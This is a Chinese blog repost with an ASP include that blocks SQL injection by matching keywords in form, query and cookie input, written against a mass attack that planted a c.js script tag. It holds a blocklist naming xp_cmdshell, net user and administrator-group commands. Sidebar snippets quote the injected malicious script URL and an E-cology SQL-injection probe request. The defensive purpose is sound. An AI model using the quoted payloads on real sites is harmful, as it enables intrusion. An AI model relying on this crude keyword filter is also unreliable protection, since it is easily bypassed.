css防注入,防止最近流行的com/css/c.js注入的解决方法

最新推荐文章于 2023-03-27 21:09:09 发布
最新推荐文章于 2023-03-27 21:09:09 发布
阅读量200 收藏
点赞数
文章标签: css防注入

最近流行的病毒SQL代码:Script Src=;现已找到解决办法。

直接复制下面的代码保存一个ASP文件

#include到数据库连接文件就OK了

至于已经存在的咋数据库直接运行一下代码替换

update ass set title =replace(cast(title as varchar(8000)),’js代码段’,”)

只能一个字段一个字段的进行替换,没有别的办法

'--------定义部份------------------

Dim XH_Post,XH_Get,XH_Cookie,XH_In,XH_Inf,XH_Xh,XH_Inf2,XH_In2

'自定义需要过滤的字串,用 "|" 分隔

XH_In = "'|;|and|exec|insert|select|delete%20from|update|count|*|%|chr|mid|master|truncate|char|declare|drop%20table|from|net%20user|xp_cmdshell|/add|net%20localgroup%20administrators|Asc|char"

XH_In2 = "'|;|and|exec|insert|select|delete%20from|update|count|chr|mid|master|truncate|char|declare|drop%20table|from|net%20user|xp_cmdshell|/add|net%20localgroup%20administrators|Asc|char"

'----------------------------------

%>

XH_Inf = split(XH_In,"|")

XH_Inf2 = split(XH_In2,"|")

'--------POST部份------------------

If Request.Form<>"" Then

For Each XH_Post In Request.Form

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request.Form(XH_Post)),XH_Inf(XH_Xh))<>0 Then

Response.Write "非法操作!系统做了如下记录↓
"

Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"
"

Response.Write "操作时间:"&Now&"
"

Response.Write "操作页面:"&Request.ServerVariables("URL")&"
"

Response.Write "提交方式:POST
"

Response.Write "提交参数:"&XH_Post&"
"

Response.Write "提交数据:"&Request.Form(XH_Post)

Response.End

End If

Next

Next

End If

'----------------------------------

'--------GET部份-------------------

If Request.QueryString<>"" Then

For Each XH_Get In Request.QueryString

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request.QueryString(XH_Get)),XH_Inf(XH_Xh))<>0 Then

Response.Write "非法操作!系统做了如下记录↓
"

Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"
"

Response.Write "操作时间:"&Now&"
"

Response.Write "操作页面:"&Request.ServerVariables("URL")&"
"

Response.Write "提交方式:GET
"

Response.Write "提交参数:"&XH_Get&"
"

Response.Write "提交数据:"&Request.QueryString(XH_Get)

Response.End

End If

Next

Next

End If

'----------------------------------

'--------COOKIE部份-------------------

If Request.Cookies<>"" Then

For Each XH_Cookie In Request.Cookies

For XH_Xh=0 To Ubound(XH_Inf2)

If Instr(LCase(Request.Cookies(XH_Cookie)),XH_Inf2(XH_Xh))<>0 Then

Response.Write "非法操作!系统做了如下记录↓
"

Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"
"

Response.Write "操作时间:"&Now&"
"

Response.Write "操作页面:"&Request.ServerVariables("URL")&"
"

Response.Write "提交方式:Cookie
"

Response.Write "提交参数:"&XH_Cookie&"
"

Response.Write "提交数据:"&Request.Cookies(XH_Cookie)

Response.End

End If

Next

Next

End If

'----------------------------------

%>

如果有必要用cookie做认证的可以用下面试验下,可以保证躲过这次的自动攻击,但手动攻击不保证能防住,有条件的还是把cookie认证改成session认证保险点

如果没有COOKIE认证,可以直接用这个,代码不需要修改

代码如下

'--------定义部份------------------

Dim XH_Post,XH_Get,XH_Cookie,XH_In,XH_Inf,XH_Xh

'自定义需要过滤的字串,用 "|" 分隔

XH_In = "'|;|and|exec|insert|select|delete%20from|update|count|*|%|chr|mid|master|truncate|char|declare|drop%20table|from|net%20user|xp_cmdshell|/add|net%20localgroup%20administrators|Asc|char"

'----------------------------------

%>

XH_Inf = split(XH_In,"|")

'--------POST部份------------------

If Request.Form<>"" Then

For Each XH_Post In Request.Form

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request.Form(XH_Post)),XH_Inf(XH_Xh))<>0 Then

Response.Write "非法操作!系统做了如下记录↓
"

Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"
"

Response.Write "操作时间:"&Now&"
"

Response.Write "操作页面:"&Request.ServerVariables("URL")&"
"

Response.Write "提交方式:POST
"

Response.Write "提交参数:"&XH_Post&"
"

Response.Write "提交数据:"&Request.Form(XH_Post)

Response.End

End If

Next

Next

End If

'----------------------------------

'--------GET部份-------------------

If Request.QueryString<>"" Then

For Each XH_Get In Request.QueryString

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request.QueryString(XH_Get)),XH_Inf(XH_Xh))<>0 Then

Response.Write "非法操作!系统做了如下记录↓
"

Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"
"

Response.Write "操作时间:"&Now&"
"

Response.Write "操作页面:"&Request.ServerVariables("URL")&"
"

Response.Write "提交方式:GET
"

Response.Write "提交参数:"&XH_Get&"
"

Response.Write "提交数据:"&Request.QueryString(XH_Get)

Response.End

End If

Next

Next

End If

'----------------------------------

'--------COOKIE部份-------------------

If Request.Cookies<>"" Then

For Each XH_Cookie In Request.Cookies

For XH_Xh=0 To Ubound(XH_Inf)

If Instr(LCase(Request.Cookies(XH_Cookie)),XH_Inf(XH_Xh))<>0 Then

Response.Write "非法操作!系统做了如下记录↓
"

Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"
"

Response.Write "操作时间:"&Now&"
"

Response.Write "操作页面:"&Request.ServerVariables("URL")&"
"

Response.Write "提交方式:Cookie
"

Response.Write "提交参数:"&XH_Cookie&"
"

Response.Write "提交数据:"&Request.Cookies(XH_Cookie)

Response.End

End If

Next

Next

End If

'----------------------------------

%>

为了自己的网站不再被SQL注入,请大家及时检查和修复漏洞.

申请创业报道,分享创业好点子。点击此处,共同探讨创业新机遇!

青狐秀水
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSS攻击技术揭密
09-14
跨站脚本(Cross Site Scripting)攻击是指在远程Web页面的HTML代码中插入恶意的JavaScriP、VBScrip,ActiveX、HTML或Flash等脚本,窃取浏览此页面的用户的信息,改变用户的设置,破坏用户数据的攻击技术。跨站脚本攻击在多数情况下不会对服务器和Web程序的运行造成影响,但对客户端的安全会构成严重的威胁,这主要是由于服务器对用户提交的数据过滤不完整造成的
css注入,CSS注入
weixin_39569894的博客
08-03 472
css就已被安全研究人员运用于渗透测试当中。使用属性选择器和iFrame,并通过css注入来窃取敏感数据的方法。但由于该方法需要iFrame,而大多数主流站点都不允许该操作,因此这种攻击方法并不实用。这里为大家详细介绍一种不需要iframe且只需10秒,就能为获得CSRF token的方法。什么是css注入大家对XSS攻击都非常熟悉了,可能很少关注到css注入攻击,以下行为有可能受到css注入攻击...
css注入,禁止Webpack注入CSS
weixin_33705384的博客
08-03 302
使用webpack,我捆绑了一个项目。 一切都很好,并且可以正常工作。 但是,我想知道是否可以不将在TS文件中导入的(S)CSS直接插入JS。 确实,我想要的只是webpack创建的输出中的单独的CSS文件和js文件。让我尝试通过一个例子来说明。 我有两个TS文件:file1.tsrequire('./style1.scss');// some ts functions...file2.tsreq...
关于防止sql注入css注入
Kind&红衣的博客
06-22 922
addslashes()函数和htmlspecialchars()函数addslashes(),向字符串中的预定义字符添加反斜杠进行转义,预定义字符:单引号(')双引号(")反斜杠(\)NULL这样的做法可以预sql的注入htmlspecialchars(),htmlspecialchars($kind_emailsAdd,ENT_QUOTES);对$lomd_emailsAdd 这个字符串变量...
利用CSS注入(无iFrames)窃取CSRF令牌
前端大全
03-03 962
(点击上方公众号,可快速关注)编译:FreeBuf.COMhttp://www.freebuf.com/articles/web/162687.htmlCSS相信大家不会陌生,在百度百科中它的解释是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。那么,它仅仅只是一种用来表示样式的语言吗?当然不是!其实早在几年前,CSS就已被安全研究人
injectron-node:将CSSJS注入到封闭源电子应用中
04-28
对于注入CSS,将注入一个将CSS添加到主样式表的脚本。 该脚本将启动目标应用程序(如果提供了参数,则带有参数),然后尝试在几秒钟的时间内注入到每个发现的窗口/ Webview中。 安装 安装依赖项 npm install 用法 ...
styles.js:从 JavaScript 对象生成 CSS。 (已停产)
06-03
在 JavaScript 中动态生成 CSS 正如 Christopher Chedeau 在他关于 CSS 的演讲中所建议的那样,建议完全放弃全局 CSS,而使用本地 CSS。 但是,Christopher 建议直接在 DOM 元素本身中嵌入样式。 结果,我们失去了...
巫术:注入JSCSS。「Witchcraft: Inject JS and CSS」-crx插件
03-09
从您的家庭文件夹注入Javascript和CSS。GreaseMonkey为开发人员! 为更高级的用户考虑Greasemonkey。 Witchcraft是Google Chrome浏览器的扩展程序,用于直接从文件系统中的文件夹加载自定义Javascript和CSS,并将它们...
Javascript和Css自动注入「Javascript & Css auto injection」-crx插件
03-10
通过url规则自动注入Javascript和CSS,上下文菜单,...通过url规则,上下文菜单,单击图标,选择文本自动注入Javascript和CSS,支持通过正则表达式比较url,支持易于测试,查看和调试代码的开发人员。 支持语言:English
98-css-injector:将 windows_98.css 全局注入每个页面
06-19
98-css-injector 将 windows_98.css 全局注入每个页面
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行护。前文学习:[网络
防止最近流行com/css/c.js注入解决方法
picerty的专栏
12-17 427
 防止最近流行com/css/c.js注入解决方法   最近IE7漏洞的爆发,使得黑客们利用最新发现IE漏洞发起攻击的数量急剧增加,而相应补丁程序目前尚未完成开发,3天时间,被注入、挂马的网站已达两万之多,为解这燃眉之急,威盾安全专家们经过努力,找到了解决最近流行病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js>的方法方法步骤
CSS是如何发起攻击的?
petertanjinjie的博客
05-07 1550
CSS是如何发起攻击的写在开头我们熟悉XSS攻击和CSRF等攻击方式但是,其他有一种攻击,是CSS攻击,今天我就在这里做一个简单的解析第一种,CSS获取用户密码当用户输入指定的密码是:前端...
注意!黑客可以通过CSS3功能攻击浏览器
w3cschools的博客
06-01 1854
  随着通过HTML5和CSS3引入的惊人数量的功能,浏览器的攻击面也相应增长。因此,这些功能之间的交互可能会导致意外行为影响用户的安全,这并不奇怪。在这篇文章中,中国知名黑客安全组织东方联盟描述了这样一个实际的攻击及其背后的研究。Bug发现  访问包含跨源资源的iframe的DOM在默认情况下被禁止。但是,iframe的内容与网站的其他部分显示在相同的上下文中,因此我们希望验证是否存在可能允许我...
关于注入(css/c.js)
weixin_34187822的博客
12-29 164
  这几天朋友的网站天天被搞破坏的人恶意注入,也许是程序没写好的原因,数据库每个字段加了一段script(&lt;Script Src=http://%63%2Enuclear3.com/css/c.js&gt;&lt;/Script&gt;,而这个script地址时不时的有变化)。 用一些搜索引擎搜索下:/css/c.js&gt;&lt;/Script&gt;,发现好多网站居然都有这个问题。...
css注入,利用CSS注入(无iFrames)窃取CSRF令牌
weixin_30768925的博客
08-03 329
原标题:利用CSS注入(无iFrames)窃取CSRF令牌CSS相信大家不会陌生,在百度百科中它的解释是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。那么,它仅仅只是一种用来表示样式的语言吗?当然不是!其实早在几年前,CSS就已被安全研究人员运用于渗透测试当中。这里有一篇文章就为我们详细介绍了一种,使用属性选择器和iFrame,并通...
css 注入,CSS injection 知识总结
weixin_39608613的博客
08-03 1127
现代浏览器都已不允许在CSS中执行JavaScript了,以前的CSS注入可以利用JavaScript协议在 url() 、 expression() 中执行Javascript代码从而实现XSS。但是目前CSS注入在窃取数据方面仍然是非常有用的,下面分别来分析一下。CSS 注入 窃取标签属性数据CSS中可以使用属性选择器,根据不同的属性选择标签。比如下面CSS选择含有a属性且其值为abc的p标签...
安全基础第六天:css注入
weixin_62870380的博客
03-27 1470
我是垃圾,没做出来,别看
detail: ID: 4322 Author: joinia Name: 泛微E-COLOGY CheckServer.jsp SQL注入 Description: 泛微 E-cology /mobile/plugin/CheckServer.jsp 存在SQL 注入漏洞,未经身份认证的远程攻击者利用此漏洞可以获取数据库敏感信息。 Identifier: DVB: DVB-2023-4322 VulnClass: - SQL注入 Category: - 应用服务 Manufacturer: 泛微网络 Product: e-cology E-cology 8.x 9.x 补丁版本 <= v10.56 Type: 1 Status: 1 Scanable: 1 Level: 3 Is0day: false IncludeExp: false Weakable: false IsXc: false IsCommon: false IsCallBack: false Condition: body="/js/ecology8" || body="wui/common/css/w7OVFont_wev8.css"||(body="weaver"&&body="ecology") || (header="ecology_JSessionId"&&body="login/Login.jsp")||body="/wui/index.html"||body="jquery_wev8" Solutions: - 所有的查询语句都使⽤数据库提供的参数化查询接⼝,参数化的语句使⽤参数⽽不是将⽤户输⼊变量嵌⼊到 SQL 语句中。 poc: relative: req0 session: false requests: - method: GET timeout: 10 path: /mobile/plugin/CheckServer.jsp?type=mobileSetting headers: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2565.59 Safari/537.36 follow_redirects: true matches: (code.eq("200") && body.contains("\"error\":\"system error\"") && header.ncontains("securityIntercept"))
最新发布
06-10
这是一份漏洞报告,报告了泛微E-COLOGY系统中的一个SQL注入漏洞。攻击者可以利用此漏洞获取数据库中的敏感信息。该漏洞的风险等级为3级,需要尽快修复。 报告建议采取参数化查询接口来替代直接将用户输入变量嵌入到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值